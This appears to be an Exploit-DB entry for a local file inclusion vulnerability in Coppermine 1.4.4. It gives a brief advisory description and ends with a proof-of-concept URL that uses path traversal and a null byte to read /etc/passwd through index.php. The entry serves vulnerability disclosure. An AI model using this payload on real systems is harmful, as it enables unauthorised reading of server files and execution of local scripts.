Coppermine 1.4.4 - 'index.php' Local File Inclusion

EDB-ID:

27669

Author:

imei

Type:

webapps

Platform:

PHP

Published:

2006-04-17

source: http://www.securityfocus.com/bid/17570/info

Coppermine is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts.

Version 1.4.4 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00